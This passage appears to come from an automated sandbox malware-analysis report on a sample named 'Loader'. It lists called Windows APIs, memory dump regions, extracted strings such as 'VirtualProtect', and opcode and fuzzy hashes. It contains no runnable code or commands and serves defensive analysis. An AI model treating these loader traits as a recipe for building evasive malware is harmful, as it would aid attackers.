                                                                                                  • Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 158306478-0
                                                                                                  • Opcode ID: 73dae66f2591af2345d16a41b03f2e9811418324495c0615151d6ce18ecc7634
                                                                                                  • Instruction ID: 00ed6c3bb440e46fd5ff7db839c4daa1cbded31df7d52c99c7df5820ff5de686
                                                                                                  • Opcode Fuzzy Hash: 73dae66f2591af2345d16a41b03f2e9811418324495c0615151d6ce18ecc7634
                                                                                                  • Instruction Fuzzy Hash: C911D2F2912B597FAB117BB66C8AC7F6E9CDE953E63550125F801E1206FE31CE0089B0
                                                                                                  APIs
                                                                                                  • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,00D539DF,00000000,00000001,?,?,?,00D4DB40,?,00000000,00000000), ref: 00D544A7
                                                                                                  • GetLastError.KERNEL32(?,00D539DF,00000000,00000001,?,?,?,00D4DB40,?,00000000,00000000,?,?,?,00D4D486,?), ref: 00D544B3
                                                                                                    • Part of subcall function 00D54510: CloseHandle.KERNEL32(FFFFFFFE,00D544C3,?,00D539DF,00000000,00000001,?,?,?,00D4DB40,?,00000000,00000000,?,?), ref: 00D54520
                                                                                                  • ___initconout.LIBCMT ref: 00D544C3
                                                                                                    • Part of subcall function 00D544E5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00D54481,00D539CC,?,?,00D4DB40,?,00000000,00000000,?), ref: 00D544F8
                                                                                                  • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,00D539DF,00000000,00000001,?,?,?,00D4DB40,?,00000000,00000000,?), ref: 00D544D8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                  • String ID:
                                                                                                  • API String ID: 2744216297-0
                                                                                                  • Opcode ID: caffe0c9877745c3bded36a99341481c13ae6176bc4571a02b0d43455adf48a7
                                                                                                  • Instruction ID: 7a2fc4ff2dff6e693c59d00f70fddfda9d7121f537a97a98009db02eb751ca36
                                                                                                  • Opcode Fuzzy Hash: caffe0c9877745c3bded36a99341481c13ae6176bc4571a02b0d43455adf48a7
                                                                                                  • Instruction Fuzzy Hash: 36F0373A041324BBCF222FD5EC09A9E3F25FB493AAB054410FD18C5230D6718964DFB6
                                                                                                  APIs
                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00D3A347
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00D3A356
                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00D3A35F
                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 00D3A36C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
• Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
• Opcode ID: 472acaaa64d4f5092aa7355497ff0c7d3ffb73e19b09b722b99e176650c21b7e
• Instruction ID: 8d89edd7c7494ecb4131dd961897051ae212997bc0e71d223859523e00d7eb9f
• Opcode Fuzzy Hash: 472acaaa64d4f5092aa7355497ff0c7d3ffb73e19b09b722b99e176650c21b7e
• Instruction Fuzzy Hash: FDF05F74D1030DEBCB04EBB4DA8999EBBF4FF1C205B9149A5A812E7210E630AB449F61
Strings
Memory Dump Source
• Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Loader.jbxd
Similarity
• API ID:
• String ID: i-i/$=B
• API String ID: 0-126065790
• Opcode ID: fd32aa7c4cfeed04607af6ff24eb17a7e0b889e07f81a378baf026acb1dada2f
• Instruction ID: 394910fe23922ef8f45c50edf5aab26095a83f32c0927f3fb208a6564b7ea91b
• Opcode Fuzzy Hash: fd32aa7c4cfeed04607af6ff24eb17a7e0b889e07f81a378baf026acb1dada2f
• Instruction Fuzzy Hash: 075187B5A043148FE720CF98EC40BDFB7E4FB89314F15467AEA589B382D67499018BD2
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Loader.jbxd
Similarity
• API ID: FreeString
• String ID: 0$?7g)
• API String ID: 3341692771-1620791588
• Opcode ID: dc74e7e31a035cc6da0004a03b346576f80cc374318cd49c129846d326b52e7e
• Instruction ID: 86af199c4f9fd635fd2a4b42a104224c0eff2a0546c2be4d583a810264cb9b60
• Opcode Fuzzy Hash: dc74e7e31a035cc6da0004a03b346576f80cc374318cd49c129846d326b52e7e
• Instruction Fuzzy Hash: 2191B570508FC0CAE326863888987D7BFD11B66318F08499DD1FE4B3D2C7BA2159C76A
APIs
• EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00D45071,?,?,00000000,00000000,00000000,?), ref: 00D45195
Strings
Memory Dump Source
• Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
• Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
Similarity
• API ID: EncodePointer
• String ID: MOC$RCC
• API String ID: 2118026453-2084237596
• Opcode ID: 2ec2d12c3f9c2bf32af6d2bef4159f6b077e0da5689661120435235509e2f7e5
• Instruction ID: 647250dd837f952a57188512e90137a92c8ab21e0c01c26f942eb2b4054cd3ea
• Opcode Fuzzy Hash: 2ec2d12c3f9c2bf32af6d2bef4159f6b077e0da5689661120435235509e2f7e5
• Instruction Fuzzy Hash: FC41BF31900609EFCF15DF98DD81AEEBBB5FF48300F18819AF908A7216D375AA50DB65
APIs
• ___except_validate_context_record.LIBVCRUNTIME ref: 00D44C53
Strings
Memory Dump Source
• Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
• Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
Similarity
• API ID: ___except_validate_context_record
• String ID: csm$csm
• API String ID: 3493665558-3733052814
• Opcode ID: 3e37b692289f94b2b2367cbbad17250b283c452d458dddb86ded277dc1ae8cbb
• Instruction ID: a1ec42a93454d5a2e9b27863542b13ebf9d6e9a1263b7130587d37564ecdf953
• Opcode Fuzzy Hash: 3e37b692289f94b2b2367cbbad17250b283c452d458dddb86ded277dc1ae8cbb
• Instruction Fuzzy Hash: 3D31D172901218EBCF269F54CC85BAA7B66FF0931AB1D465AF8545A121C332CCE1DBB1
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
• Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
Similarity
• API ID: AddressProc
• String ID: @$VirtualProtect
• API String ID: 190572456-29487290
• Opcode ID: 5ad60019fe5e420dd93eb7d29772834812f2492cdbbceba85f5bb8f2b2760d4a
• Instruction ID: bbaaff3146b4feda22f8e542c91b294fc88216cd22da5267659f7f4bb490dbdd
• Opcode Fuzzy Hash: 5ad60019fe5e420dd93eb7d29772834812f2492cdbbceba85f5bb8f2b2760d4a
• Instruction Fuzzy Hash: 5941E2B4901309DFCB04DFA9D99869EBBF0FF48304F108419E858AB350D775AA84CFA1
APIs
• RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0042324D
Strings
Memory Dump Source
• Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Loader.jbxd
Similarity
• API ID: EnvironmentExpandStrings
• String ID: G%&$G%&
• API String ID: 237503144-3960618973
• Opcode ID: d8721f94cb874452083026eed3730bcea2780d263c8d4d89944c12ffca352aec
• Instruction ID: 529b8afdffec9294dc8f884b7e1775e0d7c2f22389087f73d0e6aca8f15581c6
• Opcode Fuzzy Hash: d8721f94cb874452083026eed3730bcea2780d263c8d4d89944c12ffca352aec
• Instruction Fuzzy Hash: 30210E7460C354AFE314CF25E80071FBBE1FBC2B04F14C92DE4D96B281DA7999068B86